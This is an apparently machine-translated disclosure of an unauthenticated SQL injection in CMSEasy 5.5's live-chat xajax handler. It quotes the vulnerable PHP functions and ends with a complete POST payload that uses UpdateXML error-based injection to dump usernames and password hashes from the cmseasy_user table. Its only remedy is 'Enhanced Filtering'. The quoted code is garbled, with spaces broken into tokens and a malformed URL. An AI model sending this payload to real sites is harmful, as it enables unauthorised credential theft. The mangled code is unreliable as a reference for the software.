Cmseasy front-end does not need to log on to directly obtain SQL injection of sensitive data (proof of POC)
I downloaded the latest version of cmseasy. Someone mentioned this vulnerability before and officially fixed it. But the more I fixed it, the more urgent it was to look at the Code:
Here is where the function is registered
Celive. class. php (480-497 ):
Function xajax_live () {if (! $ This-> xajax_live_flag) {$ this-> xajax_live_flag = true; include_once (dirname (_ FILE __). '/xajax. inc. php '); include_once (dirname (_ FILE __). '/xajax. class. php '); global $ xajax_live; $ xajax_live = new xajax (); $ xajax_live-> setCharEncoding ('utf-8'); $ xajax_live-> decodeUTF8InputOn (); $ xajax_live-> registerFunction ('request'); $ xajax_live-> registerFunction ('postdata'); $ xajax_live-> registerFunction ('chathistory '); $ xajax_live-> registerFunction ('livemessage'); $ xajax_live-> registerFunction ('endchat'); $ xajax_live-> registerFunction ('getadminendchat '); $ xajax_live-> processRequests () ;}} this is the registration function we finally run.
xajx.inc.php:(175-195):
function LiveMessage($a) { global $db; $sessionid = $_SESSION['sessionid']; $name = htmlspecialchars($a['name']); $email = htmlspecialchars($a['email']); $country = htmlspecialchars($a['country']); $phone = htmlspecialchars($a['phone']); $departmentid = htmlspecialchars($a['departmentid']); $message = htmlspecialchars($a['message']); $timestamp = time(); $ip = $_SERVER['REMOTE_ADDR']; $sql = "INSERT INTO `chat` (`sessionid`,`name`,`email`,`phone`,`departmentid`,`message`,`timestamp`,`ip`,`status`) VALUES('" . $sessionid . "','" . $name . "','" . $email . "','" . $phone . "','" . $departmentid . "','" . $message . "','" . $timestamp . "','" . $ip . "','2')"; $db->query($sql); $sql = "DELETE FROM `sessions` WHERE `id`='" . $sessionid . "'"; $db->query($sql); $text = "<?php echo $lang[shout_success]?>\n"; $objResponse = new xajaxResponse('utf-8'); $objResponse->addAssign('content', 'innerHTML', $text); $objResponse->redirect('../', 5); return $objResponse;}
After figuring out this, let's take a look at how the parameters flow in:
Xajax. class. php (306-324 ):
// If gpc is enabled, the string is restored.
for ($i = 0;$i <sizeof($aArgs);$i++){if (get_magic_quotes_gpc() == 1 &&is_string($aArgs[$i])) {$aArgs[$i] = stripslashes($aArgs[$i]);}if (stristr($aArgs[$i],"<xjxobj>") != false){$aArgs[$i] = $this->_xmlToArray("xjxobj",$aArgs[$i]);}else if (stristr($aArgs[$i],"<xjxquery>") != false){$aArgs[$i] = $this->_xmlToArray("xjxquery",$aArgs[$i]);}else if ($this->bDecodeUTF8Input){$aArgs[$i] = $this->_decodeUTF8Data($aArgs[$i]);}}
See no. If gpc is enabled here, stripslashes will be used directly here. It must be used to parse xml later.
The problem is that we construct the data to be sent as follows:
Url:
Http:/// 192.168.10.70/CmsEasy_5.5_UTF-8_20140818_new/uploads/celive/live/header. php
Postdata:
xajax=LiveMessage&xajaxargs[0]=<xjxobj><q><e><k>name</k><v>',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20</v></e></q></xjxobj>
Then, access the user name and password:
Solution:
Enhanced Filtering